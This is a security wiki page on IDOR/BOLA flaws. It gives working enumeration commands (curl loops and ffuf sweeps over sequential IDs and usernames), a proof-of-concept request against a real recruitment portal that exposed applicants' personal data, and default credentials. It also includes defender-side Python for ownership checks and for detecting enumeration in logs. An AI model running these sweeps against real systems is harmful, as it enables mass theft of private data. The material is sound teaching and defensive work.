IDOR (Insecure Direct Object Reference)
Tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) appears when a web or API endpoint exposes or accepts a user-controlled identifier that is used directly to reach an internal object, without verifying that the caller is authorized to access or modify that object. Successful exploitation usually allows horizontal or vertical privilege escalation, such as reading or modifying other users' data, and in the worst case full account takeover or mass data exfiltration.
1. Identifying Potential IDORs
- Look for parameters that reference an object:
  - Path: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
  - Query: `?id=42`, `?invoice=2024-00001`
  - Body / JSON: `{"user_id": 321, "order_id": 987}`
  - Headers / Cookies: `X-Client-ID: 4711`
- Prefer endpoints that read or update data (`GET`, `PUT`, `PATCH`, `DELETE`).
- Pay attention when identifiers are sequential or predictable: if your ID is `64185742`, then `64185741` probably exists.
- Explore hidden or alternative flows (e.g. the "Paradox team members" link on login pages) that may expose additional APIs.
- Use an authenticated low-privilege session and change only the ID while keeping the same token/cookie. The absence of an authorization error is usually a sign of IDOR.
Quick manual tampering (Burp Repeater)
```http
PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json

{"lead_id":64185741}
```
Automated enumeration (Burp Intruder / curl loop)
```bash
# Walk downwards from our own lead_id; seq needs an explicit -1 step to count down.
# $TOKEN holds the session cookie of the low-privilege account used for testing.
for id in $(seq 64185742 -1 64185700); do
  curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
    -H 'Content-Type: application/json' \
    -H "Cookie: auth=$TOKEN" \
    -d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id"
done
```
Enumerating predictable download IDs (ffuf)
Authenticated file-storage panels often keep per-user metadata in a single files table and expose a download endpoint such as /download.php?id=<int>. If the handler only checks whether the ID exists (and not whether it belongs to the authenticated user), you can sweep the integer space with your own valid session cookie and pull other tenants' backups/configs:
```bash
ffuf -u http://file.era.htb/download.php?id=FUZZ \
  -H "Cookie: PHPSESSID=<session>" \
  -w <(seq 0 6000) \
  -fr 'File Not Found' \
  -o hits.json
jq -r '.results[].url' hits.json # fetch surviving IDs such as company backups or signing keys
```
- `-fr` removes 404-style templates so only true hits remain (e.g., IDs 54/150 leaking full site backups and signing material).
- The same ffuf workflow works with Burp Intruder or a curl loop; just make sure you stay authenticated while incrementing IDs.
Error-response oracle for user/file enumeration
When a download endpoint accepts both a username and a filename (e.g. /view.php?username=<u>&file=<f>), subtle differences in error messages often create an oracle:
- Non-existent username → "User not found"
- Wrong filename but correct extension → "File does not exist" (sometimes it also lists the available files)
- Wrong extension → validation error
With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "User not found" string to discover valid users:
```bash
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
  -b 'PHPSESSID=<session-cookie>' \
  -w /opt/SecLists/Usernames/Names/names.txt \
  -fr 'User not found'
```
After identifying valid usernames, request specific files directly (e.g. /view.php?username=amanda&file=privacy.odt). This pattern frequently leads to unauthorized disclosure of other users' documents and credential leakage.
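As an added, defender-side example (not code from this page or from any of the referenced targets), the following Python models the single files table behind the two scenarios above: an existence-only lookup next to a handler that ties the lookup to the session user and answers every failure with one identical response, so neither the download nor the username/file endpoint acts as an oracle. Table rows, usernames and file names are constructed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class StoredFile:
    file_id: int
    owner: str
    name: str

# Constructed sample rows standing in for the single `files` table.
FILES = {
    54: StoredFile(54, "amanda", "backup.zip"),
    150: StoredFile(150, "bob", "signing.key"),
    151: StoredFile(151, "amanda", "privacy.odt"),
}
ALLOWED_EXT = (".odt", ".doc", ".pdf")
# One response for every failure: missing, not owned, or malformed input.
NOT_FOUND = (404, "File Not Found")

def download_vulnerable(file_id, session_user):
    """Existence check only: any authenticated user can read any row."""
    row = FILES.get(file_id)
    if row is None:
        return NOT_FOUND
    return (200, row.name)

def download_hardened(file_id, session_user):
    """Ownership is part of the lookup, so the check cannot be skipped,
    and 'no such row' and 'not your row' are indistinguishable."""
    if not isinstance(file_id, int) or file_id < 0:
        return NOT_FOUND
    row = FILES.get(file_id)
    if row is None or row.owner != session_user:
        return NOT_FOUND
    return (200, row.name)

def view_hardened(username, filename, session_user):
    """The session, not the request, decides whose files are visible; an
    unknown user, a foreign user, a bad name and a bad extension all get
    the same status and body, so the endpoint is not an oracle."""
    if username != session_user:
        return NOT_FOUND
    if "/" in filename or ".." in filename or not filename.endswith(ALLOWED_EXT):
        return NOT_FOUND
    for row in FILES.values():
        if row.owner == session_user and row.name == filename:
            return (200, row.name)
    return NOT_FOUND
```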
2. Real-World Case Study – McHire Chatbot Platform (2025)
During an assessment of the Paradox.ai-powered McHire recruitment portal, the following IDOR was discovered:
- Endpoint: PUT /api/lead/cem-xhr
- Authorization: user session cookie for any test restaurant account
- Body parameter: {"lead_id": N} – 8-digit, sequential numeric identifier
By decrementing lead_id, the tester retrieved the full PII of arbitrary applicants (name, e-mail, phone, address, shift preferences) plus a consumer JWT that enabled session hijacking. Enumerating the range 1 – 64,185,742 exposed approximately 64 million records.
Proof-of-Concept request:
```bash
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
  -H 'Content-Type: application/json' \
  -d '{"lead_id":64185741}'
```
Combined with default admin credentials (123456:123456) that granted access to a test account, the vulnerability resulted in a large, critical company-wide data leak.
3. Impact of IDOR / BOLA
- Horizontal escalation – read/update/delete other users' data.
- Vertical escalation – a low-privilege user gains admin-only functionality.
- Mass data breach if identifiers are sequential (e.g., applicant IDs, invoices).
- Account takeover by stealing tokens or resetting other users' passwords.
4. Mitigations and Best Practices
- Enforce object-level authorization on every request (user_id == session.user).
- Use indirect, hard-to-guess identifiers (UUIDv4, ULID) instead of auto-increment IDs.
- Perform authorization server-side; never rely on hidden form fields or UI controls.
- Implement RBAC / ABAC checks in a central middleware.
- Add rate-limiting & logging to detect ID enumeration.
- Perform security testing on every new endpoint (unit, integration, and DAST).
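An added example (not from the page) of the logging point above: a small detector run over constructed, combined-log-style access lines that flags clients walking sequential `?id=` values or collecting mostly error responses, which is what the curl and ffuf sweeps from section 1 look like from the server side. Thresholds, IPs and timestamps are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined-log-style line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return (ip, object_id, status) for requests with a numeric ?id=, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ids = parse_qs(urlsplit(m["target"]).query).get("id")
    if not ids or not ids[0].isdigit():
        return None
    return m["ip"], int(ids[0]), int(m["status"])

def longest_consecutive_run(ids):
    """Length of the longest stretch where each ID is the previous one +/- 1."""
    run = best = 1
    for prev, cur in zip(ids, ids[1:]):
        run = run + 1 if abs(cur - prev) == 1 else 1
        best = max(best, run)
    return best

def find_enumerators(lines, min_ids=5, min_run=5, min_error_ratio=0.5):
    """Flag clients that touch many distinct IDs in order or mostly get errors."""
    per_ip = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            per_ip[parsed[0]].append(parsed[1:])
    flagged = {}
    for ip, hits in per_ip.items():
        ids = [oid for oid, _ in hits]
        if len(set(ids)) < min_ids:
            continue
        errors = sum(1 for _, status in hits if status >= 400) / len(hits)
        run = longest_consecutive_run(ids)
        if run >= min_run or errors >= min_error_ratio:
            flagged[ip] = {"requests": len(hits), "distinct_ids": len(set(ids)),
                           "longest_run": run, "error_ratio": round(errors, 2)}
    return flagged

# Constructed sample log: one normal client and one client sweeping IDs 50..57.
SAMPLE_LOG = ['10.0.0.5 - - [12/Mar/2025:10:00:%02d +0000] "GET /download.php?id=151 HTTP/1.1" 200 812' % s
              for s in (1, 9)]
SAMPLE_LOG += ['203.0.113.9 - - [12/Mar/2025:10:01:%02d +0000] "GET /download.php?id=%d HTTP/1.1" %d 0'
               % (i, 50 + i, 200 if 50 + i == 54 else 404) for i in range(8)]
```

Feed the function the lines of the download endpoint's access log; a flagged entry is the signal to rate-limit the client and to review which IDs returned 200 to it.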
5. Tools
- BurpSuite extensions: Authorize, Auto Repeater, Turbo Intruder.
- OWASP ZAP: Auth Matrix, Forced Browse.
- GitHub projects: bwapp-idor-scanner, Blindy (bulk IDOR hunting).
References
- McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII
- OWASP Top 10 – Broken Access Control
- How to Find More IDORs – Vickie Li
- HTB Nocturnal: IDOR oracle → file theft
- 0xdf – HTB Era: predictable download IDs → backups and signing keys